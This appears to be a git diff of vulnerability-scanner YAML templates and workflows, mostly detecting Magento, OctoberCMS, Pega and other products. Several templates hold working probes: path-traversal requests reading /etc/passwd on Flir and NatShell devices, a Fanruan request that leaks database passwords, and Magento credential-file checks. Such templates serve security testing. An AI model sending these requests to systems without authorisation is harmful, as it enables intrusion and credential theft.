- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"
|
|
@ -2,13 +2,13 @@ id: java-melody-exposed
|
|||
|
||||
info:
|
||||
name: JavaMelody Monitoring Exposed
|
||||
author: dhiyaneshDK
|
||||
author: dhiyaneshDK & thomas_from_offensity
|
||||
severity: medium
|
||||
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session.
|
||||
reference: |
|
||||
- https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/
|
||||
- https://github.com/javamelody/javamelody/wiki/UserGuide#16-security
|
||||
tags: config,jira,confluence,bamboo,atlassian
|
||||
tags: config,java,javamelody
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: springboot-beans
|
||||
|
||||
info:
|
||||
name: Detect Springboot Beans Actuator
|
||||
author: ajaysenr
|
||||
severity: low
|
||||
description: Displays a complete list of all the Spring beans in the application
|
||||
tags: springboot,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/beans"
|
||||
- "{{BaseURL}}/actuator/beans"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"type"'
|
||||
- '"beans"'
|
||||
- '"dependencies"'
|
||||
- '"scope"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
- "application/vnd.spring-boot.actuator"
|
||||
- "application/vnd.spring-boot.actuator.v1+json"
|
||||
condition: or
|
||||
part: header
|
|
@ -10,6 +10,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/httptrace"
|
||||
- "{{BaseURL}}/actuator/httptrace"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
id: fanruanoa-detect
|
||||
|
||||
info:
|
||||
name: FanRuanOA-detect
|
||||
author: YanYun
|
||||
severity: info
|
||||
tags: oa,tech,dotnet,fanruan
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/WebReport/ReportServer"
|
||||
- "{{BaseURL}}/ReportServer"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'DeploySuccess._init'
|
|
@ -0,0 +1,21 @@
|
|||
id: fanruanoa2012-detect
|
||||
|
||||
info:
|
||||
name: FanRuanOA2012-detect
|
||||
author: YanYun
|
||||
severity: info
|
||||
tags: oa,java,fanruan,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'down.download?FM_SYS_ID'
|
|
@ -0,0 +1,27 @@
|
|||
id: landrayoa-detect
|
||||
|
||||
info:
|
||||
name: LandrayOA detect
|
||||
author: YanYun
|
||||
severity: info
|
||||
tags: tech,landrayoa
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.jsp'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'lui_login_input_username'
|
||||
- 'lui_login_input_password'
|
||||
condition: and
|
||||
- type: word
|
||||
words:
|
||||
- 'isopen='
|
||||
part: header
|
|
@ -0,0 +1,33 @@
|
|||
id: magento-detect
|
||||
|
||||
info:
|
||||
name: Magento Detect
|
||||
author: TechbrunchFR
|
||||
severity: info
|
||||
description: Identify Magento
|
||||
tags: magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
|
||||
|
||||
# There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
|
||||
# consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check
|
||||
# https://devdocs.magento.com/guides/v2.4/graphql/
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(tolower(all_headers), "x-magento")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "graphql-authorization")'
|
||||
- 'contains(body, "The current customer")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
|
@ -1,20 +1,23 @@
|
|||
id: magmi-detect
|
||||
|
||||
info:
|
||||
name: "MAGMI (Magento Mass Importer) Plugin Detect"
|
||||
author: "dwisiswant0"
|
||||
severity: "info"
|
||||
name: MAGMI (Magento Mass Importer) Plugin Detect
|
||||
author: dwisiswant0
|
||||
severity: info
|
||||
tags: magento,magmi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/magmi/web/js/magmi_utils.js"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "magmi_multifield"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,28 @@
|
|||
id: octobercms-detect
|
||||
|
||||
info:
|
||||
name: OctoberCMS detect
|
||||
author: cyllective
|
||||
severity: info
|
||||
description: Detects OctoberCMS
|
||||
tags: tech,octobercms
|
||||
references: https://github.com/octobercms/october
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/modules/system/assets/js/framework.combined-min.js"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 1
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'october_session'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'OctoberCMS'
|
|
@ -0,0 +1,26 @@
|
|||
id: pega-detect
|
||||
|
||||
info:
|
||||
name: Pega Infinity Detection
|
||||
author: sshell
|
||||
severity: info
|
||||
tags: tech,pega
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"description" :"The Pega API'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'application/json'
|
||||
part: header
|
|
@ -0,0 +1,24 @@
|
|||
id: voipmonitor-detect
|
||||
|
||||
info:
|
||||
name: VoipMonitor detect
|
||||
author: Yanyun
|
||||
severity: info
|
||||
tags: tech,voipmonitor
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'share.voipmonitor.org'
|
||||
- 'VoIPmonitor'
|
||||
condition: and
|
|
@ -0,0 +1,23 @@
|
|||
id: xxljob-admin-detect
|
||||
|
||||
info:
|
||||
name: XXLJOB Admin Login
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: tech,xxljob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/xxl-job-admin/toLogin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<a><b>XXL</b>JOB</a>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,42 @@
|
|||
id: magento-2-exposed-api
|
||||
|
||||
info:
|
||||
name: Exposed Magento 2 API
|
||||
author: TechbrunchFR
|
||||
severity: info
|
||||
description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed.
|
||||
reference: https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api
|
||||
tags: magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/rest/V1/products'
|
||||
- '{{BaseURL}}/rest/V1/store/storeConfigs'
|
||||
- '{{BaseURL}}/rest/V1/store/storeViews'
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "searchCriteria")'
|
||||
- 'contains(body, "parameters")'
|
||||
- 'contains(body, "message")'
|
||||
- 'contains(tolower(all_headers), "application/json")'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "secure_base_link_url")'
|
||||
- 'contains(body, "timezone")'
|
||||
- 'contains(tolower(all_headers), "application/json")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "name")'
|
||||
- 'contains(body, "website_id")'
|
||||
- 'contains(tolower(all_headers), "application/json")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: magento-cacheleak
|
||||
|
||||
info:
|
||||
name: Magento Cacheleak
|
||||
author: TechbrunchFR
|
||||
severity: high
|
||||
description: Magento Cacheleak is an implementation vulnerability, result of bad implementation of web-server configuration for Magento platform. Magento was developed to work under the Apache web-server which natively works with .htaccess files, so all needed configuration directives specific for various internal Magento folders were placed in .htaccess files. When Magento is installed on web servers that are ignoring .htaccess files (such as nginx), an attacker can get access to internal Magento folders (such as the Magento cache directory) and extract sensitive information from cache files.
|
||||
reference:
|
||||
- https://support.hypernode.com/en/best-practices/security/how-to-secure-magento-cacheleak
|
||||
- https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/
|
||||
- https://royduineveld.nl/magento-cacheleak-exploit/
|
||||
tags: magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/var/resource_config.json'
|
||||
# Based on royduineveld.nl blogpost, was not tested against a vulnerable Magento site
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "media_directory"
|
||||
- "allowed_resources"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
|
@ -0,0 +1,35 @@
|
|||
id: magento-unprotected-dev-files
|
||||
|
||||
info:
|
||||
name: Magento Unprotected development files
|
||||
author: TechbrunchFR
|
||||
severity: high
|
||||
description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to Magento, "these tests are not supposed to end up on production servers".
|
||||
reference: https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing
|
||||
tags: magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/dev/tests/functional/credentials.xml.dist'
|
||||
- '{{BaseURL}}/dev/tests/functional/etc/config.xml.dist'
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "Magento")'
|
||||
- 'contains(body, "replace xmlns:xsi=")'
|
||||
- 'contains(body, "<field path=")'
|
||||
- 'contains(tolower(all_headers), "application/xml") || contains(tolower(all_headers), "application/octet-stream")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "Magento")'
|
||||
- 'contains(body, "config xmlns:xsi")'
|
||||
- 'contains(body, "<application>")'
|
||||
- 'contains(body, "<install>")'
|
||||
- 'contains(tolower(all_headers), "application/xml") || contains(tolower(all_headers), "application/octet-stream")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
|
@ -2,9 +2,9 @@ id: oracle-ebs-bispgrapgh-file-read
|
|||
|
||||
info:
|
||||
name: Oracle EBS Bispgraph File Access
|
||||
author: emenalf & tirtha_mandal
|
||||
author: emenalf & tirtha_mandal & thomas_from_offensity
|
||||
severity: critical
|
||||
tags: moodle,lfi
|
||||
tags: oracle,lfi
|
||||
reference: |
|
||||
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
|
||||
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
|
||||
|
@ -20,4 +20,4 @@ requests:
|
|||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
||||
part: body
|
||||
|
|
|
@ -27,6 +27,8 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
- "CONCRETE5"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: fanruanoa2012-disclosure
|
||||
|
||||
info:
|
||||
name: Fanruan Report 2012 Information Disclosure
|
||||
author: YanYun
|
||||
discrption: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL
|
||||
severity: high
|
||||
tags: oa,java,fanruan,disclosure
|
||||
reference: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
|
||||
- "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '"connection"'
|
||||
- '"name"'
|
||||
- '"driver"'
|
||||
- '"password"'
|
||||
- '"url"'
|
||||
- '"user"'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
|
@ -0,0 +1,25 @@
|
|||
id: flir-path-traversal
|
||||
|
||||
info:
|
||||
name: Flir Path Traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://juejin.cn/post/6961370156484263972
|
||||
tags: flir,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/download.php?file=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: natshell-path-traversal
|
||||
|
||||
info:
|
||||
name: NatShell Path Traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
|
||||
tags: natshell,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "toor:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -7,4 +7,4 @@ info:
|
|||
tags: workflow
|
||||
|
||||
workflows:
|
||||
- template: misconfiguration/aem/
|
||||
- template: misconfiguration/aem/
|
|
@ -10,7 +10,4 @@ workflows:
|
|||
|
||||
- template: exposed-panels/gitlab-detect.yaml
|
||||
subtemplates:
|
||||
- template: misconfiguration/gitlab/gitlab-public-repos.yaml
|
||||
- template: misconfiguration/gitlab/gitlab-public-signup.yaml
|
||||
- template: misconfiguration/gitlab/gitlab-public-snippets.yaml
|
||||
- template: misconfiguration/gitlab/gitlab-user-enumeration.yaml
|
||||
- template: misconfiguration/gitlab/
|
|
@ -23,11 +23,4 @@ workflows:
|
|||
- template: cves/2019/CVE-2019-3403.yaml
|
||||
- template: cves/2020/CVE-2020-14179.yaml
|
||||
- template: cves/2020/CVE-2020-14181.yaml
|
||||
- template: vulnerabilities/jira/jira-service-desk-signup.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-projects.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-resolutions.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
|
||||
- template: vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml
|
||||
- template: vulnerabilities/jira/
|
|
@ -0,0 +1,14 @@
|
|||
id: magento-workflow
|
||||
|
||||
info:
|
||||
name: Magento Security Checks
|
||||
author: TechbrunchFR
|
||||
description: A simple workflow that runs all Magento related nuclei templates on a given target.
|
||||
tags: workflow
|
||||
|
||||
workflows:
|
||||
- template: technologies/magento-detect.yaml
|
||||
subtemplates:
|
||||
- template: exposures/configs/magento-config.yaml
|
||||
- template: exposed-panels/magento-admin-panel.yaml
|
||||
- template: vulnerabilities/magento/
|
|
@ -7,6 +7,4 @@ info:
|
|||
|
||||
workflows:
|
||||
- template: default-logins/samsung/samsung-wlan-ap-default-credentials.yaml
|
||||
- template: vulnerabilities/samsung/samsung-wlan-ap-rce.yaml
|
||||
- template: vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml
|
||||
- template: vulnerabilities/samsung/samsung-wlan-ap-xss.yaml
|
||||
- template: vulnerabilities/samsung/
|
|
@ -13,14 +13,7 @@ workflows:
|
|||
|
||||
- template: technologies/springboot-actuator.yaml
|
||||
subtemplates:
|
||||
- template: misconfiguration/springboot/springboot-configprops.yaml
|
||||
- template: misconfiguration/springboot/springboot-env.yaml
|
||||
- template: misconfiguration/springboot/springboot-heapdump.yaml
|
||||
- template: misconfiguration/springboot/springboot-httptrace.yaml
|
||||
- template: misconfiguration/springboot/springboot-loggers.yaml
|
||||
- template: misconfiguration/springboot/springboot-mappings.yaml
|
||||
- template: misconfiguration/springboot/springboot-trace.yaml
|
||||
- template: vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
|
||||
- template: vulnerabilities/springboot/springboot-h2-db-rce.yaml
|
||||
- template: misconfiguration/springboot/
|
||||
- template: vulnerabilities/springboot/
|
||||
- template: cves/2018/CVE-2018-1271.yaml
|
||||
- template: cves/2020/CVE-2020-5410.yaml
|
||||
- template: cves/2020/CVE-2020-5410.yaml
|
|
@ -9,5 +9,4 @@ workflows:
|
|||
|
||||
- template: technologies/thinkcmf-detection.yaml
|
||||
subtemplates:
|
||||
- template: vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
|
||||
- template: vulnerabilities/thinkcmf/thinkcmf-rce.yaml
|
||||
- template: vulnerabilities/thinkcmf/
|
|
@ -11,7 +11,4 @@ workflows:
|
|||
matchers:
|
||||
- name: thinkphp
|
||||
subtemplates:
|
||||
- template: vulnerabilities/thinkphp/thinkphp-2-rce.yaml
|
||||
- template: vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
|
||||
- template: vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
|
||||
- template: vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
|
||||
- template: vulnerabilities/thinkphp/
|
|
@ -31,29 +31,5 @@ workflows:
|
|||
- template: cves/2020/CVE-2020-35951.yaml
|
||||
- template: cves/2020/CVE-2020-35489.yaml
|
||||
- template: cves/2021/CVE-2021-24146.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
|
||||
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
|
||||
- template: vulnerabilities/wordpress/sassy-social-share.yaml
|
||||
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-db-backup.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-debug-log.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-directory-listing.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-emergency-script.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-installer-log.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-user-enumeration.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml
|
||||
- template: vulnerabilities/wordpress/wp-xmlrpc.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
|
||||
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
|
||||
- template: vulnerabilities/wordpress/wp-uploads-listing.yaml
|
||||
- template: vulnerabilities/wordpress/wp-license-file.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
|
||||
- template: cves/2021/CVE-2021-24176.yaml
|
||||
- template: vulnerabilities/wordpress/
|
Loading…
Reference in New Issue